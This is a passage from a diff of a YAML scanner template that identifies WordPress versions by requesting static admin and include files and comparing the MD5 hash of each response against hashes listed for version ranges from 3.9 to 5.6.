dsl: + - "(\"a7c259ac67b3b4002dc8ac4a09765b9d\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"15d0c302dc74fd87bd9cfeab513e13e4\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"c17b309d8ab4b4e9653876d3c35c397d\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"fd997843190935059fe09163ecf229a5\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"b2bdc6d8dfd107ed138f042d71ad4be2\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"ec33f485ba2d4767dae9d112b78f8b02\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"8b9f36f8ca91dda15909c08299ddf4ad\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c748456e1cf97f3303ee25c838b1ad76\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/list-tables.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"42d17149c8bfdd7bebab0f53091a540a\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"beb6bf82e0790eac731ed2c9cf74bc3f\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"3ff2a3c0951e5984e1679e368706ec80\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"4b8d9513e1dda944e989056488048494\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"0a4fd78915295ce70bda1d402bfa1243\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"e5a6313e0366749912b54fc9e6040369\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"b34413b3174ac624919ce065ebb29aba\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"d3d28113c92faef3c774e0d3344e6753\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"bc8de1e3aa737d9a6450fa52af53fca9\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"90f30b6794fb69ec0541ee4c0b489642\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"de506d4d874f0c934c2fd497284f1cf3\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"6e5a8f97fb61749f4ce2774ce9882d9f\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"4306f07d19cb972ef5b21f7f7df2a700\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"e72f0c18a1ac5753fca51e7ffa4c6840\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"d037c13f12f0d6e2bb80796aa1fa7100\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"df2291c2b2d7db61ec1759a80639ae6a\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"41bf5f054e0769ac8c19771c9e7898b9\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"e185971aba90c98bede11c149165d1bd\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"bfc791004a369b00c17bac0f2422949b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/list-tables-rtl.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"746b23cd955a0b7107f57b83bb42eaa8\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"cbed75a1b6445166304c7f98e244451a\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"e7ab062a42f5d7660c2e05a20cdb1e79\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"f3db51aaac5931d61f45b7d025018ddd\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"fa889ee210eab899c77c4fb798382a7f\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"8450e3801667a4d5f4d5119cf76d23ac\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"a44b142006df40f488aec4ea1357883c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"611bc9de9e6a21a2a5e212e3662c310b\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"26f22d6631f339ad47196082f40de0d2\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"3b84dce5fe42bd82dcbdd360524e6885\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"aa514770cd537ac1dab53b85ad96b929\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"8ba73ea9935bbe0062f747e1d084f542\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"05619b1a7fa0923fdc99f081dabccc25\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"b74cc4eea587399f54605be6c761a682\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"1aa559e1f4775e857e0758979b9bb728\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"84dec80acc4755197100bfa80edf7d19\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"961ad7e71c705c7e758797f35d64035e\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"c603d3442c8daa8e824854b5d7150866\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"17daddb65adfa5ef0434db0162b86dd7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/core-data.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"c3d32f5dd4f33a89882a4f3cbafc940f\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"0ba8486f9af269c4f15ccb446fa2e5cf\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"d9d282309deba0fae8e0d9e1390bb2a0\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"cb85cf4b9ae2a6381b1a86fa89fb00aa\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"72ce8e024f83842696876fbe0b892c73\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"a4b350169e5e63499026406ea5028a6f\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"a00f664edef495e33670bc0524284989\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"0f271130cb6a7aba0a543efb33674d96\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"586fc92c2f1f003c7bed0ffa8ffd2296\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"010335a7eb409f2d9aa88519224931aa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/core-data.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"ced082774acad429d083a6950f6628c8\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"d97824b5d4dd4da084ce9d60d6d2d24c\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"73143e8195b1151c70875f1f7717e778\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"8bb6dfc7a694dc50d11d0fcf7ab7dd82\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"4e11a15c78ad0a4058eaf79431984730\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"9ad4ec366f1ecfdc2ee3246da8aeba12\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"b800c3b5370efc6207abaf2a7609edab\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"4a8ed0892820752f3167351b83bf97e4\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"f37c57b5e57c30a4fc7eb773f538a180\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"262ccfe129b4b19a5cae7bd108548486\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/editor/style-rtl.css" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"46df98dc062cb7b94aaf2fb4e4281446\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"56617c86221439d8d23e5a718e0254ad\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"54a9556e4830fb69925ad216617c5aad\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"3d25a492a20498e5cc6079bb415229cb\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"e0a7cc4c8737ceb854977049f33c3a38\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"46947f78f46f99af4bac89dd1da70cd1\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"28198d097d66e3ae2e4c629582b509c4\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"7bd14c8e33f234537fcd94d597d10899\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"e99936017ea5a1097387e30fb101f217\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3ad946b505a2b3daee06388e607b9501\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/editor/style.css" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"96e3e6b2948530ce7f016ab0400006a1\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"cd3dee513ca0233a0239f64fc6188638\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"59d50c0db9d21f6a092e347714520c01\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"3c01e1e5243ac56a810d123f6f54bdbd\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"d4f6f63315fabfe67ee51657f5dad012\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"f8b85f00c1b9dfc396d3d88b3e82e2d1\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"3db1581f4f550fbefb2e1463af099255\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"7e0f44886262bba35795227fa8509b2f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"0d82bfbebd5c1a7daca9d8838d8f42e6\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6f7537b8f5767cc8f7549c8029d8b79c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/about.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"3e86ee80c4757521083fddf65019f0f8\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"c32129f38a610afeb5dab84cc2b42e4c\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"205cf588eb9148f70d7ba3a7632fed00\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"f09335d5dd7bac3dfe1b465dedc21884\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"3ffba678fe0d4d1c646548bfa0852e0e\" == md5(body))" + - type: dsl + name: 4.9.5 - 4.9.16 + dsl: + - "(\"361b64acafceb9cf7c9ce468ad4e8bbe\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"718d7d80feb983bda20b662544bff255\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"cebf5e333fceaf3a09ac21206d9e4456\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"fa5010338412db572184b952c5f4ca1d\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"88642f61e57afda1fe4d990b74ace699\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"bbf6106da26fcee52129ee9fc94c1274\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"83bf1c455339d52f73f9f0f4dfe5ead6\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"9c19373b31c25620aaae73ff3a6c3cd3\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"6844aa5a41dc592f8d440ef94866a07d\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"1416017950ab1d21dc3e62b4bbf8b74a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/about.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"d4838a0cc22480b2f6c1bbdadacdc3ef\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"058a5c94a16613204b8b983be03b16c6\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"78b67f44579068eb8a32c2d710a197e9\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"95db5eece947287d156afe6ec7ca8403\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"a81a4579a2bf58c42998289ea1ca04d2\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"d3b700086ab8f218fd0986abe9c37601\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"f0c69f88bca95e586cd57cf7b50d56ce\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"b9fb9fd3206264ae2dfc758320e4fe2a\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"2de0fcd4fae637c2aca9a0d6bab89ae5\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"08b2f42d94424e7286e13f07c84e2613\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"871ed49ec868803d4bbda74cd056b5f2\" == md5(body))" + - type: dsl + name: 4.9.5 - 4.9.16 + dsl: + - "(\"bb9b6fbc1d72522b2a28a7eaeb188cbd\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"229b8ef25f99dcdb2a3bb54aa98e05f0\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"e926309fb95633d36c56f6d493ce1c71\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"77b749a7fbd4dbaa77847c5a31e53b81\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"932eae208509eff74628c9823eb6c857\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"d218cc5bad00dc5fbd1dbb700b9a633a\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"2ad7e2a527f4964d216eaa65bc74b9bc\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"081c37be6a3ade3eb41c567f545c838a\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"56562a00c8ad3a0e0b7cc6fce51400bd\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8c86fe6f4995c72b426099da6bb00a94\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/about-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"2df8ff7a7b394e41cba1f30b711f4597\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"9f68812437e18cc5b27b48ade01e6319\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"114df4c9f91f08b37ac227c43c9461ec\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"945adb0a070994b88b38a1435ba156b2\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"7eb9a84f6a5e8f9856fabe6f60ae26d0\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"070bb778119c82963673e25e8d87a22a\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"a2812f9bae76c25229981a60a3452159\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"e24b2585db1193b02e488fadf94556f6\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"1dedd8baf6ded0cffcd68486568f48d3\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"efa868c38c56b4f20e24e42434fd75c9\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"9ee8a4c60f28860ca3880eb08420da35\" == md5(body))" + - type: dsl + name: 4.9.5 - 4.9.16 + dsl: + - "(\"c260aca44db825b1a9c18c25e01a1994\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"44136116a8d6a562e4e24c2e92a5497e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"d8170174c63a02f4cee1ac1555f4c714\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"6e5d25bcbd4b0bc5d7985726a5c75b25\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"a8b86325839973057132c58b9b3e92aa\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"0e042d73816458bd697aad16c3949840\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"941d939b4fed92d736eca75101dfb0fd\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"ab6d1b6da897ad2f5c2d6efc5930195d\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"b4f2ce7a2583ca3be4510f6aea884f7a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"597c5b2c2a12373f069e3bfcc1234f70\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/about-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"8d05415e4e89324ef4e55877369ff484\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"cad438384d68d17329fc137dc4e70f6f\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"e49b0b679670933616a105c5e36c0996\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"6133222a9a4e020cc470597e2b03ade0\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"f20c6e14d6405a90139741f3408d131c\" == md5(body))" + - type: dsl + name: 4.9.5 - 4.9.16 + dsl: + - "(\"1e470d76d5b4e0602dcc8816b300d7da\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"ad2c3b52306afa838247a29f5dc8abaf\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"2c9b9d16ab26ca648a797cc6d1bc083b\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"30e7181b360d0371a72c736456ed9814\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"aa3864d2140200bd86c347b31d2c7208\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"5f0344be8172538fc040a5fb2b616704\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"54cef500a837d369390eaa0ce40a0c06\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"956415400ece9efeed1a49ac08c5428c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"6b60539b5b42f59ebbccefc9d007a5ba\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b7dd42474bcd55ed030b52a40c8d62b9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/media-grid.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"9cc1fed809dadd16be78544cb911c7d6\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"76fe68861654653491ec8a68ceb2da4c\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"8d6c6a7438e56ab59fddb7575b40c4e4\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.19 + dsl: + - "(\"d01d7c54b7f1e87d1b3c9e7d9cd8589c\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.24 + dsl: + - "(\"4cbc52e0ac47f37a70c89fc46eb69d4b\" == md5(body))" + - type: dsl + name: 4.1.1 - 4.1.32 + dsl: + - "(\"8a6c5d01c0ae57b622ce0a20b6de3285\" == md5(body))" + - type: dsl + name: 4.1 + dsl: + - "(\"9a70c60a2cf8bdf9508df9bb94706065\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"6fcfc76c8ca516b3b7e2e8f72e7ad2ca\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"d863d1e6f0e999c2080b1190d31cdccc\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"1fa1bd41398fffc5e65332ee0fcb4ede\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"1af7b5cd2620f279bc60b87c301079ba\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"7a93323ee3739e031e68fec070ab6d38\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"c8896b1283866646f21915c987e39997\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"f7c7b421dade9edb8932bd04ca50233a\" == md5(body))" + - type: dsl + name: 4.4.20 - 4.4.24 + dsl: + - "(\"40b80909b8b10d707d83e349bbf05cef\" == md5(body))" + - type: dsl + name: 4.2.25 - 4.2.29 + dsl: + - "(\"beec5f6a592c05e40a2b7e8e1b906cd8\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"33ce0803e0c8d668b8574f99c21502d6\" == md5(body))" + - type: dsl + name: 5.4 - 5.5.3 + dsl: + - "(\"a03ff7aeb919c4c1af45fa1ac85a8e5c\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d7de3a2d8fec560b403476fd9ed70a78\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/media-grid.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"d06c587bf1819bb955e35d6254f384f1\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"846bbf2e3acc156ce4d6deb772c703b3\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"7311485f4f9ecc49ce92bc6cc1c1d678\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.19 + dsl: + - "(\"1e05c8c75113e18fb3626f7ddbe07cbd\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.24 + dsl: + - "(\"3c666ce2209e20ef9e7e5c8417b59fc8\" == md5(body))" + - type: dsl + name: 4.1.1 - 4.1.32 + dsl: + - "(\"eb246badf364507c2f0edb0f8e38c77c\" == md5(body))" + - type: dsl + name: 4.1 + dsl: + - "(\"8d2e9573969040d7c24f7d46776962c5\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"5754139e4118cbaccd60669624da3065\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"b04ed37dbd60bc3663ada890d5af18e6\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"e9d2357fad91f0fa0122b21653d2b283\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"bc5625b3c5dec3a72a57e8456c548904\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"88f319fffd52138a412d301fcd33f88a\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"b3bf3298bc66384705d5c9c1de18a24d\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"4c9e03f3ca3f12ac8c820bca5bc48b5f\" == md5(body))" + - type: dsl + name: 4.4.20 - 4.4.24 + dsl: + - "(\"feea7fbaa550658bf561a0720dd98c2e\" == md5(body))" + - type: dsl + name: 4.2.25 - 4.2.29 + dsl: + - "(\"05d645908e3212ce5103239db436e6f9\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"9f624a3f0011d006198f92000404dc39\" == md5(body))" + - type: dsl + name: 5.4 - 5.5.3 + dsl: + - "(\"cad76757937f5deef6ddac30e8389329\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"e913c5b0e38f50d575b2d0d2240bcaba\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/updates.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"a20c8b8bcd86b05c5484f17b550d85a2\" == md5(body))" + - type: dsl + name: 4.7.5 - 4.7.19 + dsl: + - "(\"d52fdbc0a62e4bfb9cfc1c5f033c520f\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.4 + dsl: + - "(\"3e99508d7b8c46362f99dccd1dcf963c\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"c0f5ff6dd746ec2a6581fefcb2463381\" == md5(body))" + - type: dsl + name: 4.6.6 - 4.6.20 + dsl: + - "(\"cdd533d7f74e3776eed9975f9150d7ec\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.5 + dsl: + - "(\"c28e11e820bc3df934161e2b8bd534d9\" == md5(body))" + - type: dsl + name: 4.5.9 - 4.5.23 + dsl: + - "(\"35d80bf44fd2d582486dec7a23cc1880\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.8 + dsl: + - "(\"c3d379d0566156a7f2d52399b8be6282\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.9 + dsl: + - "(\"a3f43c9368858c75107e22ee643c8b9d\" == md5(body))" + - type: dsl + name: 4.4.10 - 4.4.24 + dsl: + - "(\"9f3baab230c3592d5074946bca14a80c\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.10 + dsl: + - "(\"c4da9a77a79000d837de42c577373124\" == md5(body))" + - type: dsl + name: 4.3.11 - 4.3.25 + dsl: + - "(\"0898f3c6521e958ea67134f70905f6a0\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.14 + dsl: + - "(\"e98e960b62fed4e4cdd241594d805477\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"0f5a5b69ce6a28ec4efcaf68a55c21d5\" == md5(body))" + - type: dsl + name: 4.2.15 - 4.2.29 + dsl: + - "(\"36e86bacd40a8bd856812b595564e319\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"00dc5cbe3151f0ade362e16ac8b15b9f\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"a06f2c9b655df3b573f28ecfc6c1441b\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"abf0583845e397a181226d79a8dea21a\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"3691081f395094238d54950f43053808\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.7 + dsl: + - "(\"c109de1687cdbc96ee5b65fd32b10e7e\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"2d5652fcb04e5210b9bb86317b023902\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.2 + dsl: + - "(\"45787a6ec1fdba7ec87920cb488113ce\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"d06dee6d89b3ca8dafa4beae31e81d8b\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"113fa25e9ece18de5da152a58de9648a\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"c4cbfd6b4e85c8dcff629fa3e9dbac05\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"1544137e147d6405e1d28293fcdf3ef5\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.5.3 + dsl: + - "(\"3f2145bf3b2568ca5fef63c7159c7aa1\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"045625e028cca15d1e0d5c62355f4f44\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/updates.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"0614cc34cb47d44f572435394169ccee\" == md5(body))" + - type: dsl + name: 4.7.5 - 4.7.19 + dsl: + - "(\"16789704a2a7b8a4c3c15bc8ddf57aaa\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.4 + dsl: + - "(\"480a9683a87eb320d33d5f6030ead6f6\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - 